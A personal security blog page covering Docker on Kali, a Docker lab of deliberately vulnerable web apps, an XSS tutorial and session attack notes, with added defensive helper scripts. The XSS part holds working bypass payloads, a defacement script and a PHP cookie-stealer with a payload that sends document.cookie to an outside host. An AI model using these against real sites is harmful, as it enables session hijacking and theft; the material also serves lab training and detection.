Showing posts with label Hacking Secrets Finally Revealed. Show all posts

Installation of Docker in Kali Linux and Basics.

Sunday, 5 July 2020

Today we will install Docker on Kali Linux: fresh installation, searching for a Docker image, pulling the image, and running or stopping a container.



Follow the steps shown in the video; the commands used are listed below.

Installation of Docker in Kali linux 

Commands:   (Here secrets are revealed)
Check whether Docker is already present
# sudo docker --version

# curl -fsSL https://download.docker.com/linux/debian/gpg | sudo apt-key add -
# echo 'deb [arch=amd64] https://download.docker.com/linux/debian buster stable' | sudo tee /etc/apt/sources.list.d/docker.list
# sudo apt-get update
# sudo apt-get install docker-ce  (for fresh installation)
# sudo systemctl start docker
# sudo systemctl enable docker
# sudo docker --version

Notes on the two repository lines: once apt-key adds it, the key fetched with curl is trusted for every apt repository, so check its fingerprint first (sudo apt-key fingerprint 0EBFCD88 should show 9DC8 5822 9FC7 DD38 854A E2D8 8D81 803C 0EBF CD88, the value published in Docker's install docs). apt-key itself is deprecated on newer Debian and Kali in favour of a dedicated keyring referenced with signed-by= in the sources entry. "buster" was the current Debian release when this was written; substitute the codename that matches your Kali base. Kali's own repository also ships a docker.io package (sudo apt install docker.io) if you do not need docker-ce specifically.

Search docker image 
# sudo docker search xvwa

Pull a docker image
# sudo docker pull "image name"

Check all docker Images installed
# sudo docker image ls

Run docker image 
# sudo docker run --name "anyname" -d -P "image name"
example: # sudo docker run --name xvwa -d  -P tuxotron/xvwa

To stop a running container by name
# sudo docker stop "name"

To list container IDs (-a includes stopped containers, -q prints only the IDs)
# sudo docker ps -aq

To stop a container by ID
# sudo docker stop "container id"

To remove a container by ID (a container must be stopped before it can be removed)
# sudo docker rm "container id"

To remove an image (docker rm only removes containers; remove the image's containers first)
# sudo docker rmi "image name"

Run a container so it is reachable outside the Kali Linux VM
  check the VM's IP with ifconfig (or ip addr on newer Kali, where ifconfig may be missing) and publish the port on that address
# sudo ifconfig

# sudo docker run --name xvwa -d -p (yourip):80:80 tuxotron/xvwa

-P (capital) in the earlier example publishes every port the image exposes on random high ports on all interfaces; -p (yourip):80:80 publishes only port 80, only on that address. These images are deliberately vulnerable, so bind them to the host-only or NAT address of the VM rather than a bridged interface that other machines on the network can reach.

Happy Hacking !!!!
Pprasoon

#Docker #KaliLinux #DockerInstallation #Dockerpullimage #DockerSearchImage

Web Pentesting LAB in KALI LINUX with DOCKER

Hi | Welcome | Web Pentesting in KALI LINUX with DOCKER #Pprasoon

Today, we will create a web application penetration testing lab on Kali Linux with the help of Docker.

The following works in VMware Player / Workstation or VirtualBox.

Follow the steps shown in the video; the commands used are listed below.

Step 1:
    Installation of Docker in Kali linux 
Commands: (Here secrets are revealed)
> curl -fsSL https://download.docker.com/linux/debian/gpg | sudo apt-key add -
> echo 'deb [arch=amd64] https://download.docker.com/linux/debian buster stable' | sudo tee /etc/apt/sources.list.d/docker.list
> sudo apt-get update
> sudo apt-get install docker-ce  (for fresh installation) 
> sudo systemctl start docker
> sudo systemctl enable docker
> sudo docker --version 
(apt-key is deprecated on newer Debian and Kali; check the key with sudo apt-key fingerprint 0EBFCD88 before relying on it, and replace buster with the Debian codename matching your Kali base)
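The two repository lines above (and the same lines in the Docker installation post earlier on this page) pipe a key straight into apt-key without looking at it. As an added example that is not part of either post, here is a small Python helper that downloads the key, lists it with gpg without importing it, compares its fingerprint to the one Docker publishes, and prints a sources entry that uses a dedicated keyring (signed-by=) instead of the deprecated apt-key. The sample gpg listing is constructed for the offline check; the curl/gpg invocation and the keyring path are assumptions about your machine.

```python
"""Check Docker's apt signing key against its published fingerprint before trusting it."""
import subprocess

# Fingerprint Docker publishes for its Debian repository key (key ID 0EBFCD88).
DOCKER_KEY_FPR = "9DC8 5822 9FC7 DD38 854A E2D8 8D81 803C 0EBF CD88"
KEY_URL = "https://download.docker.com/linux/debian/gpg"
KEYRING = "/usr/share/keyrings/docker-archive-keyring.gpg"   # assumed path; any root-owned file works


def normalize(fingerprint):
    return fingerprint.replace(" ", "").upper()


def fingerprints(colon_listing):
    """Fingerprints from `gpg --with-colons` output: the 'fpr' records, field 10."""
    found = []
    for line in colon_listing.splitlines():
        fields = line.split(":")
        if fields[0] == "fpr" and len(fields) > 9 and fields[9]:
            found.append(fields[9].upper())
    return found


def key_is_expected(colon_listing, expected=DOCKER_KEY_FPR):
    return normalize(expected) in fingerprints(colon_listing)


def sources_line(codename, arch="amd64", keyring=KEYRING):
    """apt source pinned to one keyring via signed-by=, instead of the deprecated apt-key."""
    return (f"deb [arch={arch} signed-by={keyring}] "
            f"https://download.docker.com/linux/debian {codename} stable")


def fetch_listing(url=KEY_URL):
    """Download the armored key and list it without importing (curl and gpg >= 2.1 assumed)."""
    armored = subprocess.run(["curl", "-fsSL", url], check=True, capture_output=True).stdout
    listing = subprocess.run(
        ["gpg", "--with-colons", "--with-fingerprint",
         "--import-options", "show-only", "--import"],
        input=armored, check=True, capture_output=True,
    )
    return listing.stdout.decode()


# Constructed sample of the listing for Docker's key; only the fpr record matters here.
SAMPLE_LISTING = (
    "pub:-:4096:1:8D81803C0EBFCD88::::-:::scESC::::::23::0:\n"
    "fpr:::::::::9DC858229FC7DD38854AE2D88D81803C0EBFCD88:\n"
    "uid:-::::::0000000000000000000000000000000000000000::Docker Release (CE deb) <docker@docker.com>::::::::::0:\n"
)

if __name__ == "__main__":
    listing = fetch_listing()
    if not key_is_expected(listing):
        raise SystemExit("fingerprint mismatch: NOT adding the Docker repository")
    # Next steps (as root): curl -fsSL KEY_URL | gpg --dearmor -o KEYRING, then
    # write sources_line("buster") to /etc/apt/sources.list.d/docker.list.
    print(sources_line("buster"))
```

Run it as a script on the VM to do the real check; the functions themselves work offline on any saved listing, which is how the constructed sample is used.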

Step 2:
        Installing deliberately vulnerable web applications such as
bWAPP
WebGoat 7.1
WebGoat 8.0
Damn Vulnerable Web App
Mutillidae II
OWASP Juice Shop
WPScan Vulnerable Wordpress
OpenDNS Security Ninjas
Altoro Mutual

Commands:  (Here secrets are revealed)
> su (switch to root; the script talks to the Docker daemon, which needs root or membership of the docker group)
> git clone https://github.com/eystsen/pentestlab.git
> cd pentestlab
> ./pentestlab.sh --help
> ./pentestlab.sh list
> ./pentestlab.sh start bwapp

First check that the broken web application's container is running, then open it in the browser
Commands: (Here secrets are revealed)
> sudo docker ps
> Copy the IP and port shown for the container (the PORTS column) and paste them into the browser

Running the above images in Kali with the help of Docker (second method).

For accessing the broken web applications from the host machine, outside the Kali Linux VM:
Commands:   (Here secrets are revealed)
> sudo docker images
> sudo docker run --name bwapp -d -p <yourip>:80:80 raesene/bwapp
> sudo docker ps
To stop any of the above containers
> sudo docker stop "name"

PLEASE STOP YOUR ANTIVIRUS BEFORE CHECKING ON THE HOST (if required): host AV may block pages served by a known-vulnerable app. Prefer an exclusion for the lab VM's address over switching protection off entirely, and keep the lab on a host-only or NAT network while it is exposed.

Configuration of Burp Suite in Firefox to intercept requests and responses
> We will install the FoxyProxy add-on and point it at Burp's proxy listener (127.0.0.1:8080 by default)

Happy Hacking !!!!
Pprasoon
#docker #kalilinux #Webpentesting #lab #virtualbox

Cross Site Scripting (XSS)

Monday, 18 June 2018

Cross Site Scripting (XSS)
===============================
Definition => Cross-site Scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it.

The ability to inject code into the generated web page is the threat. An attacker can use XSS vulnerabilities to steal cookies, hijack accounts, run ActiveX or Flash content in older browsers, force a download, and, if the browser itself has an exploitable flaw, go on to act on your hard disk and data.

Look closely at a link before clicking it: a URL that appears to come from your bank's website might actually exploit a flaw in it, and look something like http://www.website.com/somepage?redirect=<script>alert('XSS')</script>, where the "redirect" parameter is reflected into the page unencoded and so carries the attack.


XSS are 3 types
==================
Stored XSS (AKA Persistent or Type I)
Stored XSS generally occurs when user input is stored on the target server, such as in a database, in a message forum, visitor log, comment field, etc., and a victim later retrieves the stored data from the web application without that data being made safe to render in the browser.

Reflected XSS (AKA Non-Persistent or Type II)
Reflected XSS occurs when user input is immediately returned by a web application in an error message, search result, or any other response that includes some or all of the input provided by the user as part of the request, without that data being made safe to render in the browser, and without permanently storing the user-provided data. In some cases, the user-provided data may never even leave the browser.

DOM Based XSS (AKA Type-0)
DOM Based XSS is a form of XSS where the entire tainted data flow from source to sink takes place in the browser, i.e., the source of the data is in the DOM, the sink is also in the DOM, and the data flow never leaves the browser. For example, the source (where malicious data is read) could be the URL of the page (e.g., document.location.href), or it could be an element of the HTML, and the sink is a sensitive method call that causes the execution of the malicious data (e.g., document.write).

URL fragments: anything after # (hash) in a URL is not sent to the server, but JavaScript on the page can read it (location.hash), which makes the fragment a classic DOM XSS source that never appears in server logs.


Attacks that can be carried out via XSS
==========================================
> steal cookies (if they are not HttpOnly)
> retrieve the current page that the victim sees (as the victim user)
> get the current URL of the victim
> get the current referrer of the victim
> redirect to some other website
> use the application cookies to gain access to the victim's account
> use possible CSRF (cross-site request forgery) vulnerabilities to make the victim perform unwanted actions in the application (e.g. add a new user); the injected script runs in the application's origin, so anti-CSRF tokens on the page can be read and used
> inject malicious code into the victim's browser in order to exploit browser vulnerabilities
> inject a malicious Java applet, etc. (applets no longer run in modern browsers)

Mitigation
===============
> Input validation on the server side (client-side validation is for usability only; the attacker does not run it)
> Output encoding appropriate to the context the data lands in (HTML body, attribute, JavaScript, URL)
> Allow-listing of permitted input, rather than block-listing bad words (Cases 7 and 8 below bypass word filters)
> OWASP ESAPI (or the OWASP Java Encoder) for the encoding
> Mark session cookies HttpOnly and deploy a Content-Security-Policy to limit what an injected script can do

JavaScript functionality
==============================
Window object
Window object properties
1) window.location
<script>window.location.href="https://www.google.co.in"</script>

2) document.body.innerHTML
<script>document.body.innerHTML="<style>body{visibility:hidden;}</style><div style=visibility:visible;><h1>THIS SITE WAS HACKED</h1></div>";</script>


XSS Cases
===================
Case 1 :
When there is no input validation and no output encoding, use a simple payload
<script>alert(9)</script>
<svg/onload=alert(9)>
"><img src=x onerror=alert(1);>

Case 2 :
When the value lands inside a quoted attribute (value="something">), close the quote and the tag first, then put the payload outside the double quotes
"><script>alert(9)</script>
"><svg/onload=alert(9)>

Case 3 :
Try injecting the payload into all the possible parameters, input boxes, drop-down lists and hidden fields, such as
input boxes
search?q=
value=' '
drop-down list values that end up in a parameter
p=something (hidden field; intercept and edit it with Burp Suite)

Case 4 :
When an input box limits how many characters can be typed (a maxlength attribute), right-click the box, choose Inspect Element and raise the limit so the payload fits. The limit is only enforced client-side; the request can equally be edited in Burp.
value = "><svg/onload=alert(9)>

Case 5 :
When < and > are encoded inside an attribute value but the quote is not, stay inside the tag and add an event handler such as onmouseover or onclick
First check which characters are encoded or escaped
123" onmouseover="alert(9);
asd" onclick="alert(9);
When the server escapes the quote characters " and ' but leaves the attribute unquoted (value=something), no quote is needed at all
123 onmouseover=alert(9);

Case 6 : 
A rule of thumb for href: when the input becomes a hyperlink, give it the simple payload
javascript:alert(9)
and you get the alert box when the link is clicked
hyperlink payloads
<a href="http:google.com" onclick=javascript:alert(9)> when a link is always created
www.google.com" onclick="confirm(9)"> href payload (breaks out of the href attribute)

Case 7 : 
When the server removes some words or letters, encode the blocked part in Base64 and decode it at run time to bypass the filter (the string below decodes to alert(document.domain))
"><script>eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='));</script>
"><script>eval(alert(document.domain))</script>

Case 8 :
When the words script, style and on are not allowed, we have to think of something else. It is possible to Base64-encode a small HTML document containing JavaScript and have it execute as an iframe src (a data: URL), so that none of the blocked words appear in the payload itself.

<iframe src="data:text/html;base64, .... base64 encoded HTML data ....">

The HTML data we want to use is:
<script>parent.alert(document.domain);</script>

parent. is needed because we want the alert to execute in the context of the parent's window. Encoding it as Base64 (with the Character Encoding Calculator, or base64 on the command line) gives:

PHNjcmlwdD5wYXJlbnQuYWxlcnQoZG9jdW1lbnQuZG9tYWluKTs8L3NjcmlwdD4=

(Current browsers give a data: iframe an opaque origin, so parent.alert is no longer reachable from it and this exact payload fails; the bypass pattern, encoding so the filtered words never appear, is still the point.)

The code that we will then put into the search box to finish the level is:

"><iframe src="data:text/html;base64,PHNjcmlwdD5wYXJlbnQuYWxlcnQoZG9jdW1lbnQuZG9tYWluKTs8L3NjcmlwdD4="></iframe>


Case 9 : 
Sometimes playing with the surrounding HTML tags also leads to XSS
for example :
closing a textarea and then putting a payload leads to stored XSS
payload :
</textarea><svg/onload=alert(9)>

Case 10 :
Sometimes adding a parameter the page did not ask for, followed by a payload, leads to reflected XSS (for example when the page echoes the full request URL)
for example
we have a URL http://www.website.com/forgotpassword
change it to
http://www.website.com/forgotpassword?aa=<script>alert(9)</script>

Case 11 :
When the input lands inside a <script> </script> block as a string literal, it is enough to put "-alert(9)-"
the quotes close the string on either side and the minus operators make the browser evaluate alert(9) as part of the expression, so the page is vulnerable to XSS
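Cases 1, 2, 5 and 11 above are really about where in the HTML the input lands. The following Python script is an added example, not from the original post: it renders the page's own payloads through a vulnerable and a hardened template for three contexts (HTML body, attribute value, inside a <script> string) and uses the standard library's HTML tokenizer as a stand-in for the browser to show which outputs still contain an injected element or on* handler. The helper names are mine; the payloads are copied from the cases.

```python
"""XSS payloads across HTML contexts: vulnerable vs. hardened rendering."""
import html
import json
from html.parser import HTMLParser

# Payloads copied from the cases above.
PAYLOAD_BODY = "<svg/onload=alert(9)>"            # Case 1: plain HTML body
PAYLOAD_BREAK_ATTR = '"><svg/onload=alert(9)>'     # Case 2: close the quoted attribute
PAYLOAD_EVENT = '123" onmouseover="alert(9);'      # Case 5: event handler, quotes intact
PAYLOAD_UNQUOTED = "123 onmouseover=alert(9);"     # Case 5: server escaped the quotes
PAYLOAD_JS = '"-alert(9)-"'                        # Case 11: inside a JS string literal


# --- HTML body context -----------------------------------------------------
def body_vulnerable(user):
    return f"<p>Hello {user}</p>"

def body_safe(user):
    return f"<p>Hello {html.escape(user)}</p>"      # < > & " ' become entities


# --- attribute value context ----------------------------------------------
def attr_vulnerable(user):
    return f'<input value="{user}">'

def attr_quotes_only(user):
    """Case 5 as seen in the wild: quotes are escaped but the attribute is left unquoted."""
    cleaned = user.replace('"', "&quot;").replace("'", "&#39;")
    return f"<input value={cleaned}>"

def attr_safe(user):
    return f'<input value="{html.escape(user, quote=True)}">'   # quoted AND encoded


# --- JavaScript string context --------------------------------------------
def js_vulnerable(user):
    return f'<script>var q = "{user}";</script>'

def js_safe(user):
    """Emit a proper JS string literal; also break '</' so it cannot close the <script>."""
    literal = json.dumps(user).replace("</", "<\\/")
    return f"<script>var q = {literal};</script>"


# --- a stand-in for the browser's tokenizer --------------------------------
class _Scanner(HTMLParser):
    """Records injected elements and any on* attribute the tokenizer produces."""
    INJECTED_TAGS = ("svg", "img", "iframe")

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag in self.INJECTED_TAGS:
            self.findings.append(tag)
        for name, _value in attrs:
            if name.startswith("on"):
                self.findings.append(f"{tag}@{name}")


def injected(markup):
    """Return what a browser would execute that the template never intended."""
    scanner = _Scanner()
    scanner.feed(markup)
    scanner.close()
    return scanner.findings
```

The script-context case cannot be judged by an HTML tokenizer (the script body is opaque to it), which is why that pair is compared as strings: the vulnerable output contains the expression ""-alert(9)-"", the hardened one a single string literal.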

Case 12 : DOM BASED XSS
For example:
1)
Assume that the URL
http://www.vulnerable.site/welcome.html

contains the following content:
<HTML>
<TITLE>Welcome!</TITLE>
Hi
<SCRIPT>
var pos=document.URL.indexOf("name=")+5;
document.write(document.URL.substring(pos,document.URL.length));
</SCRIPT>

Welcome to our system
…</HTML>
This page uses the value of the "name" parameter in the following manner:
http://www.vulnerable.site/welcome.html?name=Joe
In this example, the JavaScript code embeds part of document.URL (the page location) into the page, without any consideration for security. An attacker can abuse this by luring the client to click on a link such as
http://www.vulnerable.site/welcome.html?name=<script>alert(document.cookie)</script>

2)
<script>

var h = document.location.hash.substring(1);
if (h && h != ""){
 var re = new RegExp(".+@.+");
 if (h.match(re)){
document.getElementById("email").innerHTML+="("+h+")";
}
}
</script>
payload = <img/src=x onerror=alert(9)>@gmail.com
Current browsers generally percent-encode < and > in the query string and fragment before they are visible through document.URL or location.hash, so these two classic examples only fire as written if the page decodes the value first (decodeURIComponent, or a framework that does so); the source-to-sink pattern is what to look for. The fix in both cases is to write the value with textContent or createTextNode instead of document.write / innerHTML.
==============
IMP :-
Inside an attribute's value field the " character may be escaped to &#34; (or &quot;). Encoding payload characters as HTML or JavaScript escapes can be done with this character encoding calculator: http://ha.ckers.org/xsscalc.html (the site is no longer maintained; any HTML/JS encoder does the same).
============================================================================================================================



Exploitation With XSS
=========================
IMP => https://www.exploit-db.com/papers/13057/
   https://www.exploit-db.com/docs/15530.pdf
http://internet.wonderhowto.com/how-to/hack-remote-internet-browser-with-xss-shell-261948/

Exploit 1 :
Attacker can redirect the victim to a malicious website
payload :
<script>alert("click ok to redirect");window.location.href="https://www.google.com"</script>

Attacker can make the victim's browser download a file of the attacker's choosing (the PuTTY binary below is a harmless stand-in)
payload
<script>document.location="http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe";</script>

Exploit 2 :
Attacker can steal the cookies of the victim
How to do it :
Stealing cookies is a three-step process; the attacker needs
1) an injected script
2) a cookie stealer (the script that receives the cookie)
3) a log file

Create an account on a server and create two files, log.txt and cookiestealer.php. You can leave log.txt empty; this is the file your cookie stealer will write to (make sure the web server cannot serve it to other people, and note that session cookies marked HttpOnly never reach document.cookie). Now paste the following PHP code into your cookie stealer script (cookiestealer.php):

cookiestealer code :

<?php
// Attacker-side logger: appends the query string (the stolen cookie) and some
// request metadata to log.txt. Kept as on the page; only real defects fixed:
// $_SERVER['METHOD'] does not exist (it is REQUEST_METHOD), 'register_gobals'
// was a typo for an option that was removed in PHP 5.4 anyway, and
// REMOTE_HOST / HTTP_REFERER are often unset (PHP reports that as notices).

function GetIP()
{
    // Client-supplied headers are checked first, so this value can be spoofed by the client.
    if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
        $ip = getenv("HTTP_CLIENT_IP");
    else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
        $ip = getenv("HTTP_X_FORWARDED_FOR");
    else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
        $ip = getenv("REMOTE_ADDR");
    else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
        $ip = $_SERVER['REMOTE_ADDR'];
    else
        $ip = "unknown";
    return($ip);
}

function logData()
{
    $ipLog = "log.txt";
    $cookie = isset($_SERVER['QUERY_STRING']) ? $_SERVER['QUERY_STRING'] : '';
    $ip = GetIP();   // the register_globals branch never ran (typo) and the option no longer exists

    $rem_port    = isset($_SERVER['REMOTE_PORT'])     ? $_SERVER['REMOTE_PORT']     : '';
    $user_agent  = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
    $rqst_method = isset($_SERVER['REQUEST_METHOD'])  ? $_SERVER['REQUEST_METHOD']  : '';
    $rem_host    = isset($_SERVER['REMOTE_HOST'])     ? $_SERVER['REMOTE_HOST']     : '';
    $referer     = isset($_SERVER['HTTP_REFERER'])    ? $_SERVER['HTTP_REFERER']    : '';
    $date = date("l dS of F Y h:i:s A");
    $log = fopen($ipLog, "a+");

    // Use <br> line breaks only if the log file itself is an .htm/.html page.
    if (preg_match("/\bhtml?\b/i", $ipLog))
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie <br>");
    else
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");
    fclose($log);
}

logData();

?>

This script records the cookie of every browser that requests it (the cookie travels in the query string).

Now find an XSS-vulnerable page, parameter or search box and put in the payload
"><script>new Image().src="http://yoursite.com/cookiestealer.php?cookie="+encodeURIComponent(document.cookie);</script>

yoursite.com is the server you're hosting your cookie stealer and log file on. The image request carries the cookie to your script, which records it in your log file, while the victim stays on the vulnerable page and sees nothing. The original form of this payload assigned document.location twice in a row (first to the stealer, then back to the vulnerable site); browsers typically perform only the last navigation, so the stealer request is often never sent. If you do want a redirect, let cookiestealer.php send a Location header back to the vulnerable page after logging.
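From the defender's side, the payloads in the cases above and the cookie-stealer request leave traces in the web server's access log. The following Python script is an added example, not part of the original post: it decodes each request line (including the double-encoded form that some filters miss), looks for the indicators those payloads contain, and reports which lines match. The log lines are constructed for the example and the indicator list is mine; tune it to your application before relying on it.

```python
"""Spot XSS payloads in web-server access-log lines."""
import re
from urllib.parse import unquote

# Indicators taken from the payloads in the cases and the cookie-stealer
# exploit above; matched against the decoded, lower-cased request target.
INDICATORS = {
    "script_tag":     re.compile(r"<\s*/?\s*script\b"),
    "event_handler":  re.compile(r"\bon[a-z]+\s*="),
    "js_uri":         re.compile(r"javascript\s*:"),
    "data_uri":       re.compile(r"data\s*:\s*text/html"),
    "cookie_read":    re.compile(r"document\s*\.\s*cookie"),
    "svg_img_iframe": re.compile(r"<\s*(svg|img|iframe)\b"),
    "eval_atob":      re.compile(r"\b(eval|atob)\s*\("),
}

# Request line inside a combined-format log entry: "GET /path?query HTTP/1.1"
_REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def decode(value, rounds=3):
    """Strip up to `rounds` layers of percent-encoding; payloads are often double-encoded."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_line(line):
    """Indicator names that fire on this log line (sorted), or [] for a clean line."""
    match = _REQUEST.search(line)
    if not match:
        return []
    target = decode(match.group("target")).lower()
    return sorted(name for name, pattern in INDICATORS.items() if pattern.search(target))


def scan_log(text):
    """[(line_number, [indicators]), ...] for every line that matched something."""
    hits = []
    for number, line in enumerate(text.splitlines(), start=1):
        found = scan_line(line)
        if found:
            hits.append((number, found))
    return hits


# Constructed sample log: one benign search, then the page's Case 2 payload,
# the Case 10 payload double-encoded, the cookie-stealer payload, and a login.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Jun/2018:10:01:02 +0000] "GET /search?q=kali HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [18/Jun/2018:10:01:07 +0000] "GET /search?q=%22%3E%3Csvg/onload=alert(9)%3E HTTP/1.1" 200 640 "-" "Mozilla/5.0"
10.0.0.9 - - [18/Jun/2018:10:01:20 +0000] "GET /forgotpassword?aa=%253Cscript%253Ealert(9)%253C/script%253E HTTP/1.1" 200 630 "-" "Mozilla/5.0"
10.0.0.9 - - [18/Jun/2018:10:02:00 +0000] "GET /search?q=%22%3E%3Cscript%3Enew%20Image().src%3D%22http://yoursite.com/cookiestealer.php?cookie%3D%22%2BencodeURIComponent(document.cookie)%3B%3C/script%3E HTTP/1.1" 200 700 "-" "Mozilla/5.0"
10.0.0.7 - - [18/Jun/2018:10:02:30 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for number, found in scan_log(SAMPLE_LOG):
        print(f"line {number}: {', '.join(found)}")
```

Only the request target is inspected here; POST bodies and the Referer field do not appear in the standard access log, so stored-XSS submissions need the application log or a proxy in front of it.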

Exploit 3 : 
Attacker can deface a page with their own page, picture or photo
Payload
<img src=link of the image>
<script>document.body.innerHTML="<style>body{visibility:hidden;}</style><div style=visibility:visible;><h1>THIS SITE WAS HACKED</h1></div>";</script>

Exploit 4 :
BeEF = Browser Exploitation Framework (hooks the victim's browser through an injected script and drives it from a control panel)

http://www.hacking-tutorial.com/hacking-tutorial/xss-attack-hacking-using-beef-xss-framework/#sthash.kypFITWL.dpbs



Session_ALL about Session

Session ID not rotated after login / not invalidated after logout
This attack is done locally: for example, in an organisation someone logs out but the server does not expire the session, so whoever captured that session ID (from a shared machine or a proxy log) can keep using it afterwards.

Attack scenario: setting the session ID with the help of XSS (see Session Fixation below)


Session Fixation
======================
Session Fixation is an attack that permits an attacker to hijack a valid user session. The attack exploits a limitation in the way the vulnerable web application manages the session ID: when authenticating a user, it doesn't assign a new session ID, making it possible to use an existing session ID. The attack consists of obtaining a valid session ID (e.g. by connecting to the application), inducing a user to authenticate himself with that session ID, and then hijacking the user-validated session by knowledge of the session ID. The attacker has to provide a legitimate web application session ID and try to make the victim's browser use it.

Session fixation is a class of session hijacking. Ordinary hijacking steals the session established between the client and the web server after the user logs in; session fixation instead plants a session in the victim's browser, so the attack starts before the user logs in.

There are several techniques to execute the attack; it depends on how the Web application deals with session tokens. Below are some of the most common techniques:

• Session token in the URL argument: The Session ID is sent to the victim in a hyperlink and the victim accesses the site through the malicious URL.

• Session token in a hidden form field: In this method, the victim must be tricked to authenticate in the target Web Server, using a login form developed for the attacker. The form could be hosted in the evil web server or directly in HTML formatted e-mail.

• Session ID in a cookie:

o Client-side script

Most browsers support the execution of client-side scripting. In this case, the attacker can use a code injection attack such as XSS (cross-site scripting) to insert malicious code into the hyperlink sent to the victim and fix a session ID in its cookie. Using document.cookie, the script sets values in the cookie that the browser will then use to keep a session between the client and the web application.

o <META> tag

<META> tag injection is also a code injection attack, but different from XSS: where scripts can be disabled or their execution denied, browsers used to process <meta http-equiv="Set-Cookie"> regardless, which made this method more reliable. Current browsers (Chrome since version 65, Firefox since version 68) no longer honour Set-Cookie in a meta tag, so this vector is mainly of historical interest.

o HTTP header response

This method uses the server response to fix the session ID in the victim's browser. By including a Set-Cookie header in the HTTP response (for example from a compromised host in the same domain, or by modifying traffic in transit), the attacker inserts the session ID value into the cookie and sends it to the victim's browser.



Session hijacking
======================
The Session Hijacking attack consists of the exploitation of the web session control mechanism, which is normally managed with a session token.

Because HTTP communication uses many different TCP connections, the web server needs a method to recognize every user's connections. The most useful method depends on a token that the web server sends to the client browser after a successful client authentication. A session token is normally a string of variable width and it can be carried in different ways: in the URL, in the HTTP request header as a cookie, in other parts of the HTTP request header, or in the body of the HTTP request.

The Session Hijacking attack compromises the session token by stealing or predicting a valid session token to gain unauthorized access to the Web Server.

The session token could be compromised in different ways; the most common are:

Predictable session token;
Session Sniffing;
Client-side attacks (XSS, malicious JavaScript Codes, Trojans, etc);
Man-in-the-middle attack
Man-in-the-browser attack

Broken Authentication and Session Management

Broken Authentication and Session Management
===============================================
Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users' identities.

Developers frequently build custom authentication and session management schemes, but building these correctly is hard. As a result, these custom schemes frequently have flaws in areas such as logout, password management, time-outs, remember me, secret question, account update, etc. Finding such flaws can sometimes be difficult, as each implementation is unique

Session IDs
=================
A session ID is a unique identifier that ties together a series of requests from the same client.
As we know, HTTP is a stateless protocol, which means it provides no built-in way for a web server to maintain state across a user's subsequent requests.
A session identifier, session ID or session token is a piece of data used in network communications (often over HTTP) to identify a session, a series of related message exchanges. Session identifiers become necessary where the communications infrastructure uses a stateless protocol such as HTTP.
For example, a buyer who visits a seller's site wants to collect a number of articles in a virtual shopping cart and then finalize the shopping by going to the site's checkout page. This typically involves an ongoing communication where several web pages are requested by the client and sent back to them by the server. In such a situation, it is vital to keep track of the current state of the shopper's cart, and a session ID is one way to achieve that goal.

A session ID is typically granted to a visitor on his first visit to a site. It is different from a user ID in that sessions are typically short-lived (they expire after a preset time of inactivity which may be minutes or hours) and may become invalid after a certain goal has been met (for example, once the buyer has finalized his order, he cannot use the same session ID to add more items).

Three widely used methods for maintaining sessions in WEB
=======================================================
1) URL arguments
2) Hidden form fields
3) Cookies (cookies have proven to be the most convenient)



Session Management
=====================
Session management is the process of keeping track of a user's activity across sessions of interaction with the computer system.
Types
======
Desktop session management => A desktop session manager is a program that can save and restore desktop sessions. A desktop session is all the windows currently running and their current content.

Browser session management => Session management is particularly useful in a web browser where a user can save all open pages and settings and restore them at a later date. To help recover from a system or application crash, pages and settings can also be restored on next run.

Web Server Session management => Hypertext Transfer Protocol (HTTP) is stateless: a client computer running a web browser must establish a new Transmission Control Protocol (TCP) network connection to the web server with each new HTTP GET or POST request. The web server, therefore, cannot rely on an established TCP network connection for longer than a single HTTP GET or POST operation. Session management is the technique used by the web developer to make the stateless HTTP protocol support session state. For example, once a user has been authenticated to the web server, the user's next HTTP request (GET or POST) should not cause the web server to ask for the user's account and password again. For a discussion of the methods used to accomplish this see HTTP cookie and Session ID

Session management over SMS =>

Vulnerabilities
===========================
> User authentication credentials aren't protected when stored (no hashing or encryption).
> Credentials can be guessed or overwritten through weak account management functions (e.g., account creation, change password, recover password, weak session IDs).
> Session IDs are exposed in the URL (e.g., URL rewriting).
> Session IDs are vulnerable to session fixation attacks.
> Session IDs don’t time-out, or user sessions or authentication tokens, particularly single sign-on (SSO) tokens, aren’t properly invalidated during logout.
> Session IDs aren’t rotated after successful login.
> Passwords, session IDs, and other credentials are sent over unencrypted connections.


Attacks Done on Session IDs
=====================================
1) Session Hijacking => The attacker gains access to the user's session by obtaining the user's session ID
2) Session fixation =>  The attacker fixes the user's session ID before the user even logs into the target server, thereby eliminating the need to obtain the user's session ID afterwards.
Ways an attacker otherwise has to obtain a session ID, which fixation avoids =>
*) Interception (encrypted communication effectively protects against interception)
*) Prediction (a cryptographically strong pseudo-random number generator, with carefully chosen seeds that don't leak from the server, prevents prediction of session IDs)
*) Brute force (prevented when the bit length is large enough relative to the number of simultaneous sessions)

Session fixation vs. session hijacking
==========================================
Timing
